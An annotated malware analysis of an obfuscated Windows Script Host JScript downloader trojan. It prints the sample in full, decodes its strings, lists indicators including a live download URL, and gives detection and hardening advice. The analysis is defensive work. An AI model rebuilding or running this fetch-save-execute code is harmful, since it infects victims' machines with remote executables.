// Analyst note: sample analysis and traffic capture show that this script is a downloader trojan.
// Unfamiliar terms can be looked up in a general reference (the original note points to Baidu Baike).
//
// Reviewer annotations. The sample text below is left exactly as published.
//
// Platform: Windows Script Host JScript (it relies on WScript.Sleep and WScript.CreateObject),
// not browser JavaScript.
//
// Layout caveat: the sample's line breaks were collapsed when this listing was published, so as
// rendered here most statements sit behind an earlier `//` on the same physical line and are not
// live code. Read the inline notes against the original one-statement-per-line layout.
//
// Obfuscation: every API name and string literal is split into one- to three-character fragments
// held in randomly named variables and concatenated at the call site. The first three variable
// groups (each spelling "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" in reverse order) and the
// pNGkr..derqHNng group are never referenced by the visible code and look like padding.
//
// Strings recovered by concatenating the fragments in call order:
//   "CreateObject", "WScript.Shell", "Run", "MSXML2.XMLHTTP", "ExpandEnvironmentStrings",
//   "%TEMP%/", "open", "GET", "ADODB.Stream", "type", "write", "position", "SaveToFile", "close"
//
// Indicators recovered from the fragments (URL defanged in this note only):
//   URL : hxxp://www.nevjegyportal[.]hu/0k6j6n4h4
//   File: %TEMP%/KySEkoM1PO7.exe
// NOTE(review): the inline analyst comments spell these "ok6j6n4h4" and "KySEKoM1PO7.exe", but the
// fragments yield a leading digit "0" (oUHbKSEqhF = "0") and a lowercase "ko" (DQZEGAm = "ko").
// Use the decoded values above when writing network or file-name matches.
//
// Behaviour, in the order the statements appear:
//   1. Four getMilliseconds() samples are taken with WScript.Sleep(10) between them and three
//      deltas (NdNAj, HRORMjJ, YSc0) are computed. The download branch runs only when the deltas
//      are not all equal. Presumably this is an anti-emulation check against environments with a
//      deterministic clock; confirm against the raw sample. The inline "10s" notes are
//      inaccurate: Sleep(10) is 10 milliseconds.
//   2. OcEOsFHpWS(n) ignores its argument and returns "MSXML2.XMLHTTP". That object issues a
//      synchronous GET (third argument false), calls send(), then polls readystate until it
//      reaches 4, sleeping 1000 ms per iteration.
//   3. ResponseBody is written through ADODB.Stream with type = 1 (binary) and persisted with
//      SaveToFile(path, 2), where 2 overwrites an existing file.
//   4. jmljvNFWjSplH(NLN) wraps WshShell.Run(NLN, 0, 0): window style 0 (hidden), no wait. In this
//      listing the call appears only as the analyst's paraphrase `jmljvNFWjSplH("/%temp%/")` behind
//      a `//`; presumably the original passed the saved path, so verify against the raw sample.
//   5. The trailing reassignments of NdNAj, HRORMjJ and YSc0 to junk strings have no effect.
//
// Detection and hardening pointers:
//   - wscript.exe / cscript.exe instantiating MSXML2.XMLHTTP together with ADODB.Stream, making an
//     outbound HTTP request, writing a .exe under %TEMP%, then spawning a child process.
//   - Script-block or AMSI logging sees the concatenated strings after deobfuscation; static
//     matching on the fragments alone is brittle because the variable names are random.
//   - Reduce exposure by disabling Windows Script Host where it is not needed (the `Enabled` value
//     under HKLM\Software\Microsoft\Windows Script Host\Settings), by re-associating .js/.jse with
//     a text editor, and by enabling the attack surface reduction rule that blocks JavaScript or
//     VBScript from launching downloaded executable content.
var uKcZJmztw = "f"; var VLjBZijBRDIxir = "sd"; var mzHiDfbVgtzWL = "uhi"; var XrxesgIWQ = "ya"; var STgtocEaUgS = "f"; var Mccq = "gsd"; var YVFRNFKC = "a7o"; var zokYxgifSUOsDIn = "d8f"; var rysGOQRkJ = "hgs"; var fAJEpxv = "7"; var LzK = "u"; var WnKggbYjhbgaYK = "dfa"; var RQJm = "s"; var tcbpCSVm = "o"; var glYioNGTMO = "a"; var cMleB = "fkj"; var guMAPaymgfr = ";l"; var aWosZJAl = "d"; var rrruwakBVMdHT = "s"; var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf //--------------------------------- var wxGM = "f"; var wME = "sd"; var WYl = "hi"; var DgXr = "yau"; var OFbjPAVgdUDSr = "sdf"; var AKaUjBxV = "g"; var YWyNEBKTCAr = "a7o"; var UmkNXPoXKvV = "8f"; var jrUTHQOJCXz = "d"; var VMrAuxWTPKwLZbj = "hgs"; var hnAKwB = "au7"; var kuRwVoQ = "f"; var OXjw = "d"; var wSaGYFaTjPu = "aos"; var UdT = "j"; var wGKytuRmi = "k"; var FwSAu = ";lf"; var uSsmxvh = "d"; var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf ////--------------------------------- var fvJysePITGsZ = "f"; var MJLm = "sd"; var OHdTWUSWyLDnD = "hi"; var NfkoHHanka = "au"; var pAJLp = "fy"; var xTeQe = "d"; var wolngRcKPNjI = "s"; var Ctd0 = "og"; var NGJpEc = "a7"; var johMrZhTBT = "f"; var rWRr = "d8"; var xhuyvlXNtG = "gs"; var AoFEsd = "7h"; var IarTKEg = "fau"; var UiCusNVVRYpV = "osd"; var SqXtHDCTAOoEfv = "ja"; var kSXJa = "k"; var AzMZQADlr = ";lf"; var OFZC = "sd"; var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf //----------------------------------- var wiM = "ose"; var cdzFN = "l"; var gtVOEyZRPMBkY = "c";//close(); //----------------------------------- var FKqYCuGSVDKEk = "e"; var yLdfoNQSLG = "Fil"; var Kegv = "o"; var REweUeFfsfzCC = "veT"; var mCxYdwKmDTeZ = "Sa";//savetofile(); //----------------------------------- var orFCagIxftilPY = "on"; var AnB = "iti"; var OeuDh = "pos";//position //----------------------------------- var bxwfUYaplk = "e"; var ZHBIenDJhvi = "t"; var OmwNrBIs = "wri";//write() //----------------------------------- var IonAXHdnbsJsHYL = 
"e"; var svvPS = "typ";//type //----------------------------------- var RxDykD = "n"; var ftsB = "ope";//open //----------------------------------- var zZoO = "am"; var TSCSrKWiKQY = "tre"; var AIfn = "B.S"; var zbAsfUmIk = "D"; var uWdDgxvOZcUG = "O"; var MUSaOvH = "D"; var YZVOwlzLPfausz = "A";//"adodb.stream" //----------------------------------- var pNGkr = "ct"; var iqPSquxJgp = "je"; var bTJnufjW = "b"; var lIexL = "teO"; var kZBJ = "rea"; var derqHNng = "C";//creatobject("adodb.stream") var LiTxpjAMHxAgUQ = "4h4"; var WWzPWldMX = "6n"; var CuF0 = "k6j"; var oUHbKSEqhF = "0"; var lQP = "hu/"; var RQUOidonsf = "l."; var NjKvurbzu = "ta"; var CSyCCMfj = "por"; var XcTxpkvH = "egy"; var aUucLqfydBnSn = "j"; var lTXzk = "ev"; var mpAARoVfxvEsej = ".n"; var NVJeSNhziHjX = "www"; var JFDhyk = "://"; var CFpmRSiBsMp = "p"; var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4 //----------------------------------- var uBtUfBIHbmz = "T"; var LwKK = "GE";// get //----------------------------------- var KRPXN = "pen"; var HrNtkpOuBMYa = "o";//open //----------------------------------- var OFdMpJOyw = "e"; var NlpqQU = "x"; var cZpOdxEyvqRfb = "7.e"; var cLfbaiuobq = "PO"; var XmXyEnhbtWhG = "M1"; var DQZEGAm = "ko"; var cKoUGmrGJtE = "SE"; var QasyJ = "Ky";//KySEKoM1PO7.exe //----------------------------------- var eQyCEVqQUazI = "%/"; var tNgKCALxxEpJMf = "P"; var mNYqbv = "M"; var FrwlCZOPjcmJvoE = "E"; var KyNfXZkSc = "%T";//%TEMP%/ //----------------------------------- var AjbjrFWcHO = "gs"; var RyW = "in"; var LVlachWJa = "Str"; var NGjUy = "t"; var ZXMail = "n"; var XLaaPawDhGaz = "e"; var lRTf = "m"; var EGxwfaNKp = "ron"; var UCOpd = "vi"; var xZQvOWiNMG = "n"; var NLgbSPQIDLAIj = "ndE"; var Gyo = "xpa"; var gPYeoLnn = "E";//expendenvironmentstrings //----------------------------------- var kpsxpufDRzihIGv = "TP"; var vGOfgZZdOVh = "T"; var wJOAaSUgz = "LH"; var bPhWMdYs = "XM"; var AwpqZN = "2."; var RNVidTrApbBfHO = "XML"; var ynXoQhqDiQydxVe = 
"MS";//msxml2.xmlhttp //----------------------------------- var zkeMzwunlwoMdUD = "n"; var oVQABSTeJWqKG = "Ru"; var WkRVEzGFpaMCAC = "ell"; var AoJg = "h"; var HDveUfs = "S"; var PGItzPyn = "."; var iTVqHxcrEbduDt = "t"; var wxGWFQyhW = "rip"; var KDSFP = "c"; var nzV = "WS";//wscript.shell.run() //----------------------------------- var NFFhujLOFwsUs = "ct"; var kvZBOvoVgLSEG = "je"; var DXP = "b"; var zjRmzjunjFUys = "O"; var EcDMPFvaxG = "e"; var stMA = "at"; var KnALPhmOVixZ = "Cre";//createobject() //----------------------------------- var aCTc = new Date(); var SZT0 = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var bRDtyPAQicD = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var VrU = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var DEyWdL = aCTc.getMilliseconds(); // var NdNAj = bRDtyPAQicD - SZT0; //var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds(); // // 10s var HRORMjJ = VrU - bRDtyPAQicD; // 10s var YSc0 = DEyWdL - VrU; // 10s WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC); //wshShell=wscript[createobject](wscript.shell.run); function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);} //function jmljvNFWjSplH(NLN) //{ // WshShell[run](NLN,0,0); //} function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;} //function OcEOsFHpWS(n) //{ // return MSxml2.xmlhttp; //} if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw; 
//fOikDMmzwkAuGlw=/%temp%/ path //WshShell[expendedenvironmentstrings](%temp%); EFASPqJ = OcEOsFHpWS(0); //var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP"); wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ); // //xmlhttp object //[HrNtkpOuBMYa + KRPXN]==open wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false); //wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false); //xmlhttp.open("get","url",false); wMRqfsrlJdPwT.send(); while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)}; //readystate elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO); //var adoStream=createobject("adodb.stream"); elcHu[HrNtkpOuBMYa + KRPXN](); //adoStream.open(); elcHu[svvPS + IonAXHdnbsJsHYL] = 1; //adoStream.type=1; elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody); //adoStream.write(wMRqfsrlJdPwT.ResponseBody); elcHu[OeuDh + AnB + orFCagIxftilPY] = 0; //adoStream.position=0; elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 ); //adoStream.savetofile(/%temp%/,2); elcHu[gtVOEyZRPMBkY + cdzFN + wiM](); //adoStream.close(); // jmljvNFWjSplH("/%temp%/"); //WshShell[run](NLN,0,0) NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();; //10s HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD; //new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds(); //10s YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU; //10s }